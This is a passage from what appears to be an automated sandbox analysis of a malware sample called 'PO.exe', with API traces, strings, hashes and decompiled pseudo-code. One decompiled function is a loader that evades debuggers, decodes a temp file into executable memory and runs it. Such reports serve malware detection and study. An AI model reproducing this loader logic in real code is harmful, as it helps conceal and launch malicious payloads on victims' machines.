0x00000000
0x00000000
0x00000000
0x00000000
0x004053a5
0x004053a5
0x004053ae
0x004053b4
0x004053b9
0x004053bc
0x004053be
0x004053c2
0x004053c4
0x004053c4
0x004053c2
0x004053c7
0x004053ca
0x004053dd
0x004053df
0x004053e4
0x004053ea
0x004053ec
0x00405407
0x0040540e
0x00405414
0x00405416
0x0040543b
0x00405418
0x00405418
0x0040541c
0x00405430
0x0040541e
0x00405421
0x00405429
0x00405429
0x0040541c
0x004053ee
0x004053f4
0x004053f6
0x004053fc
0x004053fc
0x004053f6
0x00000000
0x004053ec
0x004053cc
0x004053cf
0x004053d1
0x00000000
0x00000000
0x004053d3
0x004053d5
0x00000000
0x00000000
0x004053d7
0x004053db
0x00000000
0x00000000
0x00000000
0x00405440
0x0040544a
0x00405450
0x00405450
0x0040545b
0x00000000
0x00405341
0x00405341
0x00405343
0x0040546b
0x0040546e
0x00405471
0x004054c9
0x004054c9
0x004054c9
0x00405473
0x00405476
0x00405481
0x00405486
0x00405488
0x00000000
0x00000000
0x0040548b
0x00405496
0x0040549d
0x004054a3
0x004054a5
0x00000000
0x004054c1
0x004054a7
0x004054ab
0x00000000
0x00000000
0x004054b0
0x00000000
0x004054b7
0x00405478
0x00405478
0x00000000
0x00405478
0x00405349
0x0040534d
0x00000000
0x00000000
0x00000000
0x0040534d

APIs

DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\PO.exe" ,00000000), ref: 0040531F
lstrcatA.KERNEL32(007A0588,\*.*,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\PO.exe" ,00000000), ref: 00405369
lstrcatA.KERNEL32(?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\PO.exe" ,00000000), ref: 0040537C
lstrlenA.KERNEL32(?,?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\PO.exe" ,00000000), ref: 00405382
FindFirstFileA.KERNEL32(007A0588,?,?,?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\PO.exe" ,00000000), ref: 00405393
FindNextFileA.KERNEL32(?,?,000000F2,?), ref: 0040544A
FindClose.KERNEL32(?), ref: 0040545B

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405335
"C:\Users\user\Desktop\PO.exe" , xrefs: 0040530B
\*.*, xrefs: 00405363

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\PO.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-3018238072
Opcode ID: 8380fa4691e2e165f963ed649da4ecfc2ff1d2e951a9b6cdbac17f467c00847b
Instruction ID: f738604874d37791e21c186390ce59424126d5fa43ea1a12c0606eb471faeee6
Opcode Fuzzy Hash: 8380fa4691e2e165f963ed649da4ecfc2ff1d2e951a9b6cdbac17f467c00847b
Instruction Fuzzy Hash: 5B51E030804A04AADB216F228C49BFF3A78DF82759F14817BF944B51D2C77C5982DE6E

Uniqueness

Uniqueness Score: -1.00%

Function 73351000, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 88
filememorystringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E73351000() {
				char _v532;
				void* _t5;
				void* _t8;
				void* _t25;
				signed int _t26;
				long _t27;
				WCHAR* _t28;
				void* _t29;
				void* _t30;
				DWORD* _t31;

				 *_t31 = 0;
				if(IsDebuggerPresent() != 0) {
					DebugBreak();
				}
				_t28 =  &_v532;
				_t5 = GetTempPathW(0x103, _t28);
				if(_t5 != 0) {
					lstrcatW(_t28, L"\\yfmgdsfcotdgfk");
					_t5 = CreateFileW(_t28, 0x80000000, 7, 0, 3, 0x80, 0); // executed
					if(_t5 != 0xffffffff) {
						_t29 = _t5;
						_t5 = GetFileSize(_t5, 0);
						if(_t5 != 0xffffffff) {
							_t27 = _t5;
							_t5 = VirtualAlloc(0, _t5, 0x3000, 0x40); // executed
							 *0x73353000 = _t5;
							if(_t5 != 0) {
								_t5 = ReadFile(_t29, _t5, _t27, _t31, 0); // executed
								if(_t5 != 0) {
									_t30 =  *0x73353000;
									if( *_t31 == 0) {
										L10:
										_t8 =  *_t30(); // executed
										return _t8;
									}
									_t25 = 0;
									_t26 = 0;
									do {
										_t25 = _t25 + 0xfe;
										asm("rol bl, 0x2");
										asm("rol bl, 1");
										asm("ror al, 1");
										 *(_t30 + _t26) = _t26 ^ ((((0 - (0 -  *(_t30 + _t26) ^ 0x000000de) ^ 0x00000006) & 0x000000ff) + _t26 ^ 0x000000aa) & 0x000000ff) + _t26 - 0x00000001;
										_t26 = _t26 + 1;
										_t30 =  *0x73353000;
									} while (_t26 <  *_t31);
									goto L10;
								}
							}
						}
					}
				}
				return _t5;
			}

0x73351009
0x73351018
0x7335101a
0x7335101a
0x73351020
0x7335102a
0x73351032
0x7335103e
0x73351057
0x73351060
0x73351066
0x7335106b
0x73351074
0x73351076
0x73351082
0x7335108a
0x7335108f
0x73351099
0x733510a1
0x733510a7
0x733510ad
0x733510ef
0x733510ef
0x00000000
0x733510ef
0x733510af
0x733510b1
0x733510b3
0x733510bc
0x733510cd
0x733510da
0x733510de
0x733510e0
0x733510e3
0x733510e4
0x733510ea
0x00000000
0x733510b3
0x733510a1
0x7335108f
0x73351074
0x73351060
0x733510fa

APIs

IsDebuggerPresent.KERNEL32 ref: 73351010
DebugBreak.KERNEL32 ref: 7335101A
GetTempPathW.KERNEL32(00000103,?), ref: 7335102A
lstrcatW.KERNEL32(?,\yfmgdsfcotdgfk), ref: 7335103E
CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 73351057
GetFileSize.KERNEL32(00000000,00000000), ref: 7335106B
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 73351082
ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 73351099

Strings

\yfmgdsfcotdgfk, xrefs: 73351038

Memory Dump Source

Source File: 00000000.00000002.242781422.0000000073351000.00000020.00020000.sdmp, Offset: 73350000, based on PE: true

Associated: 00000000.00000002.242778197.0000000073350000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242784001.0000000073352000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242786576.0000000073354000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AllocBreakCreateDebugDebuggerPathPresentReadSizeTempVirtuallstrcat
String ID: \yfmgdsfcotdgfk
API String ID: 4020703165-1636925236
Opcode ID: db2e7802c711fc870de9cc687adc8bb93d11e6575c7950139d5d76d47735b4da
Instruction ID: 6c922a58b0b3851849c7224f3fafeac47e7afd4edee821caa3a282ae1618cdee
Opcode Fuzzy Hash: db2e7802c711fc870de9cc687adc8bb93d11e6575c7950139d5d76d47735b4da
Instruction Fuzzy Hash: E021CF337413446FFB302A378C1AFA73BAD9B41721F284218F99AD70C0DB6868458A65

Uniqueness

Uniqueness Score: -1.00%

Function 00401FDC, Relevance: 9.1, APIs: 6, Instructions: 72
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00401FDC(int __ebx) {
				struct HINSTANCE__* _t20;
				struct HINSTANCE__* _t27;
				int _t28;
				struct HINSTANCE__* _t33;
				CHAR* _t35;
				intOrPtr* _t36;
				void* _t37;

				_t28 = __ebx;
				 *(_t37 - 4) = 1;
				SetErrorMode(0x8001); // executed
				if( *0x7a3030 < __ebx) {
					_push(0xffffffe7);
					goto L14;
				} else {
					_t35 = E00402A9A(0xfffffff0);
					 *(_t37 + 8) = E00402A9A(1);
					if( *((intOrPtr*)(_t37 - 0x14)) == __ebx) {
						L3:
						_t20 = LoadLibraryA(_t35); // executed
						_t33 = _t20;
						if(_t33 == _t28) {
							_push(0xfffffff6);
							L14:
							E00401428();
						} else {
							goto L4;
						}
					} else {
						_t27 = GetModuleHandleA(_t35); // executed
						_t33 = _t27;
						if(_t33 != __ebx) {
							L4:
							_t36 = GetProcAddress(_t33,  *(_t37 + 8));
							if(_t36 == _t28) {
								E00404D62(0xfffffff7,  *(_t37 + 8));
							} else {
								 *(_t37 - 4) = _t28;
								if( *((intOrPtr*)(_t37 - 0x1c)) == _t28) {
									 *_t36( *((intOrPtr*)(_t37 - 8)), 0x400, 0x7a4000, 0x40b018, 0x409000);
								} else {
									E00401428( *((intOrPtr*)(_t37 - 0x1c)));
									if( *_t36() != 0) {
										 *(_t37 - 4) = 1;
									}
								}
							}
							if( *((intOrPtr*)(_t37 - 0x18)) == _t28) {
								FreeLibrary(_t33);
							}
						} else {
							goto L3;
						}
					}
				}
				SetErrorMode(_t28);
				 *0x7a3008 =  *0x7a3008 +  *(_t37 - 4);
				return 0;
			}

0x00401fdc
0x00401fe4
0x00401fe7
0x00401ff3
0x00402093
0x00000000
0x00401ff9
0x00402001
0x0040200b
0x0040200e
0x0040201d
0x0040201e
0x00402024
0x00402028
0x0040208f
0x00402095
0x00402095
0x00000000
0x00000000
0x00000000
0x00402010
0x00402011
0x00402017
0x0040201b
0x0040202a
0x00402034
0x00402038
0x0040207c
0x0040203a
0x0040203d
0x00402040
0x00402070
0x00402042
0x00402045
0x0040204e
0x00402050
0x00402050
0x0040204e
0x00402040
0x00402084
0x00402087
0x00402087
0x00000000
0x00000000
0x00000000
0x0040201b
0x0040200e
0x0040209b
0x00402932
0x0040293e

APIs

SetErrorMode.KERNELBASE(00008001), ref: 00401FE7
GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402011

Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078E938,00789938), ref: 00404DBE
Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E

LoadLibraryA.KERNELBASE(00000000,00000001,000000F0), ref: 0040201E
GetProcAddress.KERNEL32(00000000,?), ref: 0040202E
FreeLibrary.KERNEL32(00000000,000000F7,?), ref: 00402087
SetErrorMode.KERNEL32 ref: 0040209B

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$ErrorLibraryModelstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 1609199483-0
Opcode ID: dec3fbaa8690636eaa49f40ab7a36df9d34a383e5316d53f08f1eda561668ae6
Instruction ID: 46783d0d57a84ebc5ebfcf140bac70f9b04df1374f396a157ff0b90552cbbe62
Opcode Fuzzy Hash: dec3fbaa8690636eaa49f40ab7a36df9d34a383e5316d53f08f1eda561668ae6
Instruction Fuzzy Hash: 19210B31D04321EBCB216F659E8C95F7A70AF95315B20413BF712B62D1C7BC4A82DA9E

Uniqueness

Uniqueness Score: -1.00%

Function 00405C94, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 24
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C94(CHAR* _a4) {
				void* _t3;
				void* _t8;

				SetErrorMode(0x8001); // executed
				_t3 = FindFirstFileA(_a4, 0x7a15d0); // executed
				_t8 = _t3; // executed
				SetErrorMode(0); // executed
				if(_t8 == 0xffffffff) {
					return 0;
				}
				FindClose(_t8); // executed
				return 0x7a15d0;
			}

0x00405ca2
0x00405cae
0x00405cb6
0x00405cb8
0x00405cbd
0x00000000
0x00405cca
0x00405cc0
0x00000000

APIs

SetErrorMode.KERNELBASE(00008001,00000000,007A0988,C:\Users\user\AppData\Local\Temp\,004055EF,007A0988,007A0988,00000000,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\PO.exe" ), ref: 00405CA2
FindFirstFileA.KERNELBASE(?,007A15D0), ref: 00405CAE
SetErrorMode.KERNELBASE(00000000), ref: 00405CB8
FindClose.KERNELBASE(00000000), ref: 00405CC0

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405C94

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFindMode$CloseFileFirst
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2885216544-823278215
Opcode ID: 2793f7a1020c472c0b2cc591d231d4d262c91262e7ffd9c0c44dd2ab926118f0
Instruction ID: 58bb4516a74dc5dde44cdc206f1ac441c4a30f5218be24d725a78a1f01f55fab
Opcode Fuzzy Hash: 2793f7a1020c472c0b2cc591d231d4d262c91262e7ffd9c0c44dd2ab926118f0
Instruction Fuzzy Hash: 6AE08632B1971057D20057B45D88D0B3AA8D7C5721F100132F211B73D0D5755C114BE5

Uniqueness

Uniqueness Score: -1.00%

Function 00403526, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 215
stringregistrylibraryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00403526() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				int _t42;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t82;
				CHAR* _t84;
				CHAR* _t85;

				_t80 =  *0x7a2f88;
				_t20 = E00405CD2("KERNEL32.dll", "GetUserDefaultUILanguage");
				_t88 = _t20;
				if(_t20 == 0) {
					_t78 = 0x79f580;
					"1033" = 0x7830;
					E004058B3(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x79f580);
					__eflags =  *0x79f580;
					if(__eflags == 0) {
						E004058B3(0x80000003, ".DEFAULT\\Control Panel\\International", "Locale", 0x79f580);
					}
					lstrcatA("1033", _t78);
				} else {
					E0040591D("1033",  *_t20() & 0x0000ffff);
				}
				E004037F2(_t75, _t88);
				_t84 = "C:\\Users\\alfons\\AppData\\Local\\Temp";
				 *0x7a3000 =  *0x7a2f90 & 0x00000020;
				if(E004055AC(_t88, _t84) != 0) {
					L16:
					if(E004055AC(_t96, _t84) == 0) {
						_push( *((intOrPtr*)(_t80 + 0x118)));
						_push(_t84);
						E004059E1(0, _t78, _t80);
					}
					_t28 = LoadImageA( *0x7a2f80, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x7a2768 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E00401410(0) == 0) {
							_t30 = E004037F2(_t75, __eflags);
							__eflags =  *0x7a3020;
							if( *0x7a3020 != 0) {
								_t31 = E00404E34(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E00401410(1);
									goto L33;
								}
								__eflags =  *0x7a274c;
								if( *0x7a274c == 0) {
									E00401410(2);
								}
								goto L22;
							}
							ShowWindow( *0x79f560, 5);
							_t85 = "RichEd20.dll";
							_t37 = LoadLibraryA(_t85);
							__eflags = _t37;
							if(_t37 == 0) {
								M004092B6 = 0x3233;
								LoadLibraryA(_t85);
							}
							_t82 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t82, 0x7a2720);
							__eflags = _t38;
							if(_t38 == 0) {
								 *0x4092ac = 0;
								GetClassInfoA(0, _t82, 0x7a2720);
								 *0x7a2744 = _t82;
								 *0x4092ac = 0x32;
								RegisterClassA(0x7a2720);
							}
							_t42 = DialogBoxParamA( *0x7a2f80,  *0x7a2760 + 0x00000069 & 0x0000ffff, 0, E004038BF, 0);
							E00401410(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x7a2f80;
						 *0x7a2734 = _t28;
						_v20 = 0x624e5f;
						 *0x7a2724 = E00401000;
						 *0x7a2730 =  *0x7a2f80;
						 *0x7a2744 =  &_v20;
						if(RegisterClassA(0x7a2720) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x79f560 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a2f80, 0);
						goto L21;
					}
				} else {
					_t75 =  *(_t80 + 0x48);
					if(_t75 == 0) {
						goto L16;
					}
					_t78 = 0x7a1f20;
					E004058B3( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x7a2fb8, 0x7a1f20);
					_t61 =  *0x7a1f20; // 0x49
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x7a1f21;
						 *((char*)(E004054F7(0x7a1f21, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ".exe") != 0) {
						L15:
						E004059BF(_t84, E004054CC(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
							E00405513(_t78);
							goto L15;
						}
						_t96 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x0040352c
0x0040353d
0x00403544
0x00403546
0x0040355a
0x0040355f
0x00403575
0x0040357a
0x00403580
0x00403592
0x00403592
0x0040359d
0x00403548
0x00403553
0x00403553
0x004035a2
0x004035ac
0x004035b5
0x004035c1
0x00403647
0x0040364f
0x00403651
0x00403657
0x00403658
0x00403658
0x0040366e
0x00403674
0x00403682
0x00403711
0x00403719
0x00403723
0x00403728
0x0040372e
0x004037c0
0x004037c5
0x004037c7
0x004037e3
0x00000000
0x004037e3
0x004037c9
0x004037cf
0x004037d7
0x004037d7
0x00000000
0x004037cf
0x0040373c
0x00403748
0x0040374e
0x00403750
0x00403752
0x00403755
0x0040375e
0x0040375e
0x00403766
0x0040376e
0x00403770
0x00403772
0x00403777
0x0040377d
0x00403780
0x00403786
0x0040378d
0x0040378d
0x004037ac
0x004037b6
0x00000000
0x004037bb
0x0040371b
0x0040371d
0x00000000
0x00403688
0x00403688
0x0040368e
0x00403698
0x004036a0
0x004036aa
0x004036b0
0x004036be
0x004037e8
0x004037e8
0x00000000
0x004037e8
0x004036c4
0x004036cd
0x0040370c
0x00000000
0x0040370c
0x004035c7
0x004035c7
0x004035cc
0x00000000
0x00000000
0x004035d6
0x004035e5
0x004035ea
0x004035f1
0x00000000
0x00000000
0x004035f5
0x004035f7
0x00403604
0x00403604
0x0040360c
0x00403612
0x0040363a
0x00403642
0x00000000
0x00403624
0x00403625
0x0040362e
0x00403634
0x00403635
0x00000000
0x00403635
0x00403630
0x00403632
0x00000000
0x00000000
0x00000000
0x00403632
0x00403612

APIs

Part of subcall function 00405CD2: GetModuleHandleA.KERNEL32(000000F1,0040571A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CD6
Part of subcall function 00405CD2: LoadLibraryA.KERNEL32(000000F1,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CE4
Part of subcall function 00405CD2: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CF3

lstrcatA.KERNEL32(1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage,"C:\Users\user\Desktop\PO.exe" ,00000000,00000000,C:\Users\user\AppData\Local\Temp\,00000020), ref: 0040359D
lstrlenA.KERNEL32(007A1F20,?,?,?,007A1F20,C:\Users\user\AppData\Local\Temp,1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage,"C:\Users\user\Desktop\PO.exe" ,00000000), ref: 00403607
lstrcmpiA.KERNEL32(?,.exe,007A1F20,?,?,?,007A1F20,C:\Users\user\AppData\Local\Temp,1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage), ref: 0040361A
GetFileAttributesA.KERNEL32(007A1F20), ref: 00403625
LoadImageA.USER32 ref: 0040366E
RegisterClassA.USER32 ref: 004036B5

Part of subcall function 0040591D: wsprintfA.USER32 ref: 0040592A

SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004036CD
CreateWindowExA.USER32 ref: 00403706
ShowWindow.USER32(00000005,00000000), ref: 0040373C
LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040374E
LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040375E
GetClassInfoA.USER32 ref: 0040376E
GetClassInfoA.USER32 ref: 0040377D
RegisterClassA.USER32 ref: 0040378D
DialogBoxParamA.USER32 ref: 004037AC

Strings

_Nb, xrefs: 004036C4, 004036C9
C:\Users\user\AppData\Local\Temp, xrefs: 004035AC, 004035B4, 00403641, 00403647, 00403657
.exe, xrefs: 00403614
KERNEL32.dll, xrefs: 00403538
Control Panel\Desktop\ResourceLocale, xrefs: 0040356B
'z, xrefs: 0040367D
RichEdit20A, xrefs: 00403766, 0040376C, 00403775
1033, xrefs: 0040354E, 00403598
C:\Users\user\AppData\Local\Temp\, xrefs: 00403529
"C:\Users\user\Desktop\PO.exe" , xrefs: 00403532
.DEFAULT\Control Panel\International, xrefs: 00403588
RichEd20.dll, xrefs: 00403748, 0040374D, 00403754
Locale, xrefs: 00403583
GetUserDefaultUILanguage, xrefs: 00403533

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: 'z$"C:\Users\user\Desktop\PO.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$KERNEL32.dll$Locale$RichEd20.dll$RichEdit20A$_Nb
API String ID: 914957316-3552346376
Opcode ID: 3309331118697da18f1ff15fefd605bdcd3012e4522bb3cb26734b4951d889a7
Instruction ID: 4e9c7f181e94f196de7c88ece58cce9fa533c44585b571451200f5668265d8f3
Opcode Fuzzy Hash: 3309331118697da18f1ff15fefd605bdcd3012e4522bb3cb26734b4951d889a7
Instruction Fuzzy Hash: 5361C2B1504240BFE720AF699D45E2B3AACEB85759B00457FF941B22E2D73D9D018B2E

Uniqueness

Uniqueness Score: -1.00%

Function 00402C37, Relevance: 35.2, APIs: 10, Strings: 10, Instructions: 195
memoryCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00402C37(void* __eflags, signed int _a4) {
				struct HWND__* _v8;
				long _v12;
				long _v16;
				void* _v20;
				intOrPtr _v24;
				long _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v48;
				long _t52;
				signed int _t56;
				void* _t62;
				intOrPtr* _t66;
				long _t67;
				signed int _t73;
				signed int _t78;
				signed int _t79;
				long _t84;
				intOrPtr _t89;
				void* _t91;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				void* _t97;
				signed int _t101;
				void* _t102;

				_v8 = 0;
				_t52 = GetTickCount();
				_v16 = 0;
				_v12 = 0;
				_t100 = "C:\\Users\\alfons\\Desktop";
				_t97 = _t52 + 0x3e8;
				GetModuleFileNameA( *0x7a2f80, "C:\\Users\\alfons\\Desktop", 0x400);
				_t91 = E00405690(_t100, 0x80000000, 3);
				_v20 = _t91;
				 *0x409020 = _t91;
				if(_t91 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405513(_t100);
				_t56 = GetFileSize(_t91, 0);
				__eflags = _t56;
				 *0x79d938 = _t56;
				_t101 = _t56;
				if(_t56 <= 0) {
					L27:
					__eflags =  *0x7a2f8c;
					if( *0x7a2f8c == 0) {
						goto L33;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L31:
						_t102 = GlobalAlloc(0x40, _v28);
						E004030FF( *0x7a2f8c + 0x1c);
						_push(_v28);
						_push(_t102);
						_push(0);
						_push(0xffffffff);
						_t62 = E00402EBD();
						__eflags = _t62 - _v28;
						if(_t62 == _v28) {
							__eflags = _a4 & 0x00000002;
							 *0x7a2f88 = _t102;
							if((_a4 & 0x00000002) != 0) {
								 *_t102 =  *_t102 | 0x00000008;
								__eflags =  *_t102;
							}
							__eflags = _v48 & 0x00000001;
							 *0x7a3020 =  *_t102 & 0x00000018;
							 *0x7a2f90 =  *_t102;
							if((_v48 & 0x00000001) != 0) {
								 *0x7a2f94 =  *0x7a2f94 + 1;
								__eflags =  *0x7a2f94;
							}
							_t49 = _t102 + 0x44; // 0x44
							_t66 = _t49;
							_t93 = 8;
							do {
								_t66 = _t66 - 8;
								 *_t66 =  *_t66 + _t102;
								_t93 = _t93 - 1;
								__eflags = _t93;
							} while (_t93 != 0);
							_t67 = SetFilePointer(_v20, 0, 0, 1); // executed
							 *(_t102 + 0x3c) = _t67;
							E00405670(0x7a2fa0, _t102 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						GlobalFree(_t102);
						goto L33;
					}
					E004030FF( *0x789930);
					_t73 = E004030CD( &_v12, 4); // executed
					__eflags = _t73;
					if(_t73 == 0) {
						goto L33;
					}
					__eflags = _v16 - _v12;
					if(_v16 != _v12) {
						goto L33;
					}
					goto L31;
				} else {
					do {
						_t92 = _t101;
						asm("sbb eax, eax");
						_t78 = ( ~( *0x7a2f8c) & 0x00007e00) + 0x200;
						__eflags = _t101 - _t78;
						if(_t101 >= _t78) {
							_t92 = _t78;
						}
						_t79 = E004030CD(0x795938, _t92); // executed
						__eflags = _t79;
						if(_t79 == 0) {
							__eflags = _v8;
							if(_v8 != 0) {
								DestroyWindow(_v8);
							}
							L33:
